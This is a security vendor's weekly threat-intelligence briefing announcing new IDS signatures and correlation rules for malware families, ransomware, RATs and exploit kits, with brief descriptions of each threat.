J2 CSC September 4th Weekly Briefing
This week, threat Intelligence Update for our Cybersecurity Platform –Be Vigilant, Be Informed and Be Safe!
New Detection Technique - Datper
Datper has been observed in targeted attacks against Japanese organizations since around June 2016.
Datper infects systems either through drive-by download attacks or by exploiting vulnerabilities in asset management software.
Datper communicates with Command and Control servers using the HTTP protocol, limiting its communications to a specific time window.
We've added IDS signatures and the following correlation rule to detect this activity:
- System Compromise, Trojan infection, Datper
#Datper #Trojan infection
New Detection Technique - Koadic
Koadic is a Windows post-exploitation toolkit, similar to other penetration testing tools such as Meterpreter and Powershell Empire.
What makes Koadic unique is that it performs most of its operations using Windows Script Host (JScript/VBScript), with compatibility in the core to support multiple versions of Microsoft operating systems from Windows 2000 through Windows 10.
We have added IDS signatures and the following correlation rule to detect this activity:
- System Compromise, Trojan infection, Koadic
#Kodiac #Trojan infection
New Detection Technique - Ransomware
In the past week, we've seen an uptick in ransomware activity in the wild.
We have added IDS signatures and the following correlation rules to detect new ransomware families:
- System Compromise, Ransomware infection, SyncCrypt
We also added IDS signatures and updated correlation rules to better detect the following ransomware families:
- System Compromise, Ransomware infection, Cerber
- System Compromise, Ransomware infection, Mole
- System Compromise, Ransomware infection, Spora
#SyncCrypt #Cerber #Mole #Spora
New Detection Techniques
We've added the following correlation rules as a result of additional recent malicious activity:
- System Compromise, Trojan infection, MSIL/HookUp
- System Compromise, Trojan infection, StressHub
#MSIL/HookUp #StressHub
Updated Detection Technique - Exploit Kits
Exploit kits are used in "drive-by downloads." Undetectable by normal users, these kits are embedded in websites by attackers.
When a user browses to a website hosting an exploit kit, the kit attempts all known attack methods to compromise the user and install malware on the user's machine.
This approach is a common attack vector and a major source of infections for end users.
Cybercriminals constantly change the patterns they use within their code to evade detection.
We've added IDS signatures and updated the following correlation rule to improve exploit kit detection:
- Delivery & Attack, Malicious website - Exploit Kit, Malicious redirection
- Exploitation & Installation, Malicious website - Exploit Kit, Disdain EK
#Exploit Kits #Malicious redirection #Disdain
Updated Detection Technique - Malware SSL Certificates
We've added new IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
The updated correlation rules use this information to detect command and control communications related to several malware families, including:
- System Compromise, Command and Control Communication, Known malicious SSL certificate
#Malware SSL Certificates #Known malicious SSL certificate
Updated Detection Technique - Remote Access Tools
The typical attack pattern involves first an attack (exploited vulnerability) and then installation of malware.
Often this last step includes a Remote Administration Toolkit (RAT) used to gain control to the compromised machine.
We added IDS signatures and correlation rules to detect the following RAT activity:
- System Compromise, Malware RAT, KONNI
- System Compromise, Malware RAT, NanoCore
#RAT #KONNI #NanoCore
Updated Detection Technique - Ransomware
In the past week, we've seen an uptick in ransomware activity in the wild.
We've added IDS signatures and updated the following correlation rules to detect the ransomware families:
- System Compromise, Ransomware infection, Cerber
- System Compromise, Ransomware infection, Defray
- System Compromise, Ransomware infection, Spora
- System Compromise, Ransomware infection, Torrentlocker
#Cerber #Defray #Spora #Torrentlocker
Updated Correlation Rules
We've updated the following correlation rules as a result of recent malicious activity:
- Delivery & Attack, Malicious website, Phishing activity
- Exploitation & Installation, Client Side Exploit - Known Vulnerability, Malicious Document
- Exploitation & Installation, Client Side Exploit - Known Vulnerability, MSXMLHTTP Request
- Exploitation & Installation, Service Exploit, Samba Username Map Script RCE (CVE-2007-2447)
- Exploitation & Installation, WebServer Attack, PHP-CGI exploit followed by web shell
- System Compromise, Malware infection, CoinMiner
- System Compromise, Targeted Malware, APT.9002
- System Compromise, Trojan infection, Generic PowerShell
- System Compromise, Trojan infection, Hancitor
#Phishing activity #Malicious Document #MSXMLHTTP Request #Samba Username Map Script RCE (CVE-2007-2447) #PHP-CGI exploit followed by web shell #CoinMiner #APT.9002 #Generic PowerShell #Hancitor
- Hits: 1364